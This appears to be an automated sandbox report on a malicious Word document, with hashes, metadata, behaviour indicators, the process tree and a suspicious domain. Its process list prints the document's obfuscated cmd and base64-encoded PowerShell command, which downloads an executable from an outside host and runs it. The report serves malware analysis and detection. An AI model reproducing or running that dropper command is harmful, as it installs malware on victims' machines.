analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | 15edcb2fc3b4d2fc1700f8e6837cd5c4759fb3791787c9cd9d0e16f129e0b234 |
| Full analysis: | https://app.any.run/tasks/40ee5403-90ae-4413-8b29-74f43a86d2ba |
| Verdict: | Malicious activity |
| Analysis date: | November 15, 2018, 12:18:03 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Future-proofed upward-trending projection, Subject: Nebraska Alexandrine, Author: (487)788-8830, Comments: Open-source incremental hardware, Template: Normal, Last Saved By: Windows, Revision Number: 10, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Fri Nov 9 08:31:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
| MD5: | C0E5D7D0C0AC523F42F919928112933E |
| SHA1: | A7C113939D210809CF3264EA64A1C2B62003BBD7 |
| SHA256: | 15EDCB2FC3B4D2FC1700F8E6837CD5C4759FB3791787C9CD9D0E16F129E0B234 |
| SSDEEP: | 1536:nb9hwtFC6Ff4gHYNjjtBv36J6jE17uyP0ND13OPSji69R80QVHs:vw3C6sTvKMJHL9GtV |
MALICIOUS
Executes PowerShell scripts
- CMd.eXe (PID: 2568)
Starts CMD.EXE for commands execution
- WINWORD.EXE (PID: 3216)
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 3216)
SUSPICIOUS
Creates files in the user directory
- powershell.exe (PID: 2432)
INFO
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 3216)
Creates files in the user directory
- WINWORD.EXE (PID: 3216)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
EXIF
FlashPix
| Title: | Future-proofed upward-trending projection |
|---|---|
| Subject: | Nebraska Alexandrine |
| Author: | (487)788-8830 |
| Keywords: | - |
| Comments: | Open-source incremental hardware |
| Template: | Normal |
| LastModifiedBy: | Пользователь Windows |
| RevisionNumber: | 10 |
| Software: | Microsoft Office Word |
| TotalEditTime: | 2.0 minutes |
| CreateDate: | 2018:04:19 18:59:00 |
| ModifyDate: | 2018:11:09 08:31:00 |
| Pages: | 1 |
| Words: | - |
| Characters: | 1 |
| Security: | None |
| CodePage: | Windows Cyrillic |
| Manager: | Keven Nikolaus |
| Company: | Johns-West Berry Beier |
| Bytes: | 103424 |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 1 |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | |
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Word 97-2003 Document |
Total processes
39
Monitored processes
5
Malicious processes
2
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 3216 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\15edcb2fc3b4d2fc1700f8e6837cd5c4759fb3791787c9cd9d0e16f129e0b234.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
| 3440 | "C:\Windows\system32\cmd.exe" | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
| 2424 | ping 8.8.8.8 | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
| 2568 | CMd.eXe /c p^o^W^e^r^S^h^e^l^L^.^e^x^e^ ^-^e^c^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^w^A^G^8^A^Z^A^B^5^A^G^w^A^b^w^B^z^A^H^Q^A^b^w^B^s^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^X^A^E^U^A^U^w^A^v^A^G^Y^A^Y^Q^B^0^A^G^8^A^Z^w^A^u^A^H^A^A^a^A^B^w^A^D^8^A^b^A^A^9^A^G^U^A^a^Q^B^k^A^G^k^A^O^Q^A^u^A^H^g^A^Y^Q^B^w^A^C^I^A^L^A^A^g^A^C^Q^A^Z^Q^B^u^A^H^Y^A^O^g^B^B^A^F^A^A^U^A^B^E^A^E^E^A^V^A^B^B^A^C^A^A^K^w^A^g^A^C^c^A^X^A^A^3^A^G^Q^A^N^w^B^m^A^G^U^A^M^A^B^j^A^G^E^A^L^g^B^l^A^H^g^A^Z^Q^A^n^A^C^k^A^O^w^A^g^A^F^M^A^d^A^B^h^A^H^I^A^d^A^A^t^A^F^A^A^c^g^B^v^A^G^M^A^Z^Q^B^z^A^H^M^A^I^A^A^k^A^G^U^A^b^g^B^2^A^D^o^A^Q^Q^B^Q^A^F^A^A^R^A^B^B^A^F^Q^A^Q^Q^A^n^A^F^w^A^N^w^B^k^A^D^c^A^Z^g^B^l^A^D^A^A^Y^w^B^h^A^C^4^A^Z^Q^B^4^A^G^U^A^J^w^A^7^A^C^A^A^R^Q^B^4^A^G^k^A^d^A^A^= | C:\Windows\system32\CMd.eXe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
| 2432 | poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBwAG8AZAB5AGwAbwBzAHQAbwBsAC4AYwBvAG0ALwBXAEUAUwAvAGYAYQB0AG8AZwAuAHAAaABwAD8AbAA9AGUAaQBkAGkAOQAuAHgAYQBwACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXAA3AGQANwBmAGUAMABjAGEALgBlAHgAZQAnACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAnAFwANwBkADcAZgBlADAAYwBhAC4AZQB4AGUAJwA7ACAARQB4AGkAdAA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | CMd.eXe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
Total events
1 360
Read events
967
Write events
0
Delete events
0
Modification events
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3216 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9B0C.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2432 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y5U09Q3BJHQ8BAEVN9ZI.temp | — | |
MD5:— | SHA256:— | |||
| 2432 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF18c9a4.TMP | binary | |
MD5:0C5E84CFB7FDA503A7F95914AD626D14 | SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D | |||
| 2432 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C5E84CFB7FDA503A7F95914AD626D14 | SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D | |||
| 3216 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:70C278D8BB09C3041479A9BC2AF4E1A9 | SHA256:D69E23B5D0FBBBEA2B15D68BAE73B8D21CB5A54E7F9352E099020E7F51DABA60 | |||
| 3216 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$edcb2fc3b4d2fc1700f8e6837cd5c4759fb3791787c9cd9d0e16f129e0b234.doc | pgc | |
MD5:DA1E85B964CABEDEF7AC18D8D8A99BF7 | SHA256:B91AF67950BD3DFF3AB1DD3DF1D88A205D5FB8C0227D28F0F5A3BFD4A06068C8 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
1
Threats
0
HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
DNS requests
Domain | IP | Reputation |
|---|---|---|
podylostol.com |
| suspicious |